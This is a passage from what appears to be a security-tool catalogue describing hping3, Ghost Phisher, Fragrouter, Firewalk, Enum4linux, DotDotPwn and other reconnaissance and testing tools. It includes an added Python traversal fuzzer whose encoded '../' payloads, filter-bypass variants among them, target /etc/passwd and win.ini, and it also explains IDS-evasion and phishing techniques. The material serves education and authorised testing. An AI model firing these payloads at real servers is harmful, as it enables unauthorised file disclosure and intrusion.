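def demo_identd(request: bytes) -> str:
    sport = int(request.decode("ascii").split(",")[0])
    return DEMO_REPLIES.get(sport, "%d , 40000 : ERROR : NO-USER" % sport)
```

A service running as root in the output is the finding worth chasing, but treat the names as hints only: the target controls identd and some implementations deliberately return random or fixed usernames.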

hping3

Description

Hping3 is a network tool able to send custom TCP/IP packets and to display target replies, as ping does with ICMP replies. hping3 can handle fragmentation and almost arbitrary packet size and content, using the command-line interface.

Hping3 Tool | IEMLabs

GoLismero

Description

GoLismero is an open source framework for security testing. It’s currently geared towards web security, but it can easily be expanded to other kinds of scans.


GoLismero Tool | IEMLabs

Ghost Phisher

Description

Ghost Phisher is a wireless and Ethernet security auditing and attack program written in Python with the Python Qt GUI library. It can emulate access points and deploy various internal network servers for networking, penetration testing and phishing attacks.

Ghost Phisher Tool | IEMLabs

Fragrouter

Description

Fragrouter is a network intrusion detection evasion toolkit written by Dug Song. It runs as an inline router and rewrites outbound traffic using the insertion and evasion techniques described in Ptacek and Newsham's 1998 paper “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”: IP fragmentation with tiny, overlapping or out-of-order fragments, TCP segmentation with duplicate, overlapping or reordered segments, and similar tricks. It is used to check whether an IDS reassembles a stream the same way the end host does, since any difference lets an attack slip past the sensor.

Fragrouter Tool | IEMLabs

Firewalk

Description

Firewalk is an active reconnaissance tool that determines which layer 4 protocols (TCP or UDP ports) a packet-filtering device such as a firewall or router will forward. It sends TCP or UDP probes with an IP TTL one greater than the hop count to the targeted gateway: if the gateway passes the probe, the next hop answers with an ICMP time-exceeded message and the port is known to be open through the filter; if nothing comes back, the filter most likely dropped it. The technique maps a filter's rule set without needing a listening service behind it.

Firewalk Tool | IEMLabs

Fierce

Description

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It’s really meant as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately.

Fierce Tool | IEMLabs

Faraday

Description

Faraday introduces a new concept, IPE (Integrated Penetration-Test Environment): a multiuser penetration test IDE. It is designed for distributing, indexing and analysing the data generated during a security audit. Faraday was made to let you take advantage of the available tools in the community in a truly multiuser way.

Faraday Tool | IEMLabs

EyeWitness

Description

EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if known.

EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line, nmap xml output, or nessus xml output.

EyeWitness Tool | IEMLabs

EnumIAX

Description

EnumIAX is an Inter Asterisk Exchange protocol username brute-force enumerator.

EnumIAX may operate in two distinct modes: Sequential Username Guessing or Dictionary Attack.

EnumIAX Tool | IEMLabs

Enum4linux

Description

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.

Enum4linux Tool | IEMLabs

DotDotPwn

Description

DotDotPwn is a very flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers and web platforms such as CMSs, ERPs, blogs, etc.

It also has a protocol-independent module that sends the desired payload to a specified host and port, and it can be driven from scripts through its STDOUT module.

DotDotPwn Tool | IEMLabs
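
The payload generation a traversal fuzzer like the one above performs, as an added example that is not DotDotPwn's own code. It varies depth, separator and encoding, pairs each payload with a target file and the string that proves the file was read, and runs the set against a constructed vulnerable handler (`demo_vulnerable_server`, which stands in for a real HTTP/FTP/TFTP request returning a response body).

```python
"""Added example, not DotDotPwn's own code: generate the traversal payload
set a fuzzer like it sends (varying depth, separator and encoding), pair
each payload with a target file and the string that proves it was read,
and run them against a constructed vulnerable handler. `send` would in a
real run be an HTTP/FTP/TFTP request returning the response body."""
import posixpath
from typing import Callable, Dict, List

# Dot-dot sequences; the encoded forms are aimed at filters that only
# strip the literal "../".
DOTDOT_VARIANTS = [
    "../",        # plain POSIX
    "..\\",       # plain Windows
    "..%2f",      # URL-encoded slash
    "%2e%2e/",    # URL-encoded dots
    "%2e%2e%2f",  # fully URL-encoded
    "..%252f",    # double-encoded slash (decoded twice by some stacks)
    "..%c0%af",   # overlong UTF-8 slash (historical IIS bypass)
    "....//",     # becomes "../" after one non-recursive strip of "../"
]

# Target file -> substring expected in the response when the read succeeds.
TARGET_FILES = {
    "etc/passwd": "root:",
    "windows/win.ini": "[fonts]",
}


def traversal_payloads(max_depth: int = 6,
                       targets: Dict[str, str] = TARGET_FILES) -> List[Dict[str, str]]:
    """Cartesian product of depth x variant x target, as {'payload', 'signature'}."""
    payloads: List[Dict[str, str]] = []
    for depth in range(1, max_depth + 1):
        for dotdot in DOTDOT_VARIANTS:
            prefix = dotdot * depth
            for path, signature in targets.items():
                # Use backslashes inside the file path for the Windows-style variant.
                file_part = path.replace("/", "\\") if dotdot == "..\\" else path
                payloads.append({"payload": prefix + file_part, "signature": signature})
    return payloads


def fuzz(send: Callable[[str], str], max_depth: int = 6) -> List[str]:
    """Send every payload and return those whose response carried the signature."""
    return [p["payload"] for p in traversal_payloads(max_depth)
            if p["signature"] in send(p["payload"])]


# Constructed stand-in for a vulnerable handler: it joins the request path
# onto a document root three directories deep and serves /etc/passwd if the
# normalised path lands there. It does not URL-decode, so only the plain
# "../" variant at depth >= 3 succeeds.
def demo_vulnerable_server(request_path: str) -> str:
    full = posixpath.normpath("/var/www/html/" + request_path)
    if full == "/etc/passwd":
        return "root:x:0:0:root:/root:/bin/bash\n"
    return "404 Not Found"
```

Matching on a signature string rather than on the status code is what keeps the false-positive rate down: a handler that answers 200 with an error page to every request would otherwise look vulnerable at every depth. The depth sweep matters because the document root's distance from `/` is unknown; a hit at depth 3 but not 2 in the demo is exactly that measurement.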

DNSWalk

Description

Dnswalk is a DNS debugger. It performs zone transfers of specified domains, and checks the database in numerous ways for internal consistency, as well as accuracy.

DnsWalk Tool | IEMLabs

DNSTracer

Description

Dnstracer determines where a given Domain Name Server (DNS) gets its information from, and follows the chain of DNS servers back to the servers which know the data. Its behaviour is similar to ntptrace(8), which does it for the NTP protocol.

DNSTracer Tool | IEMLabs

Dnsmap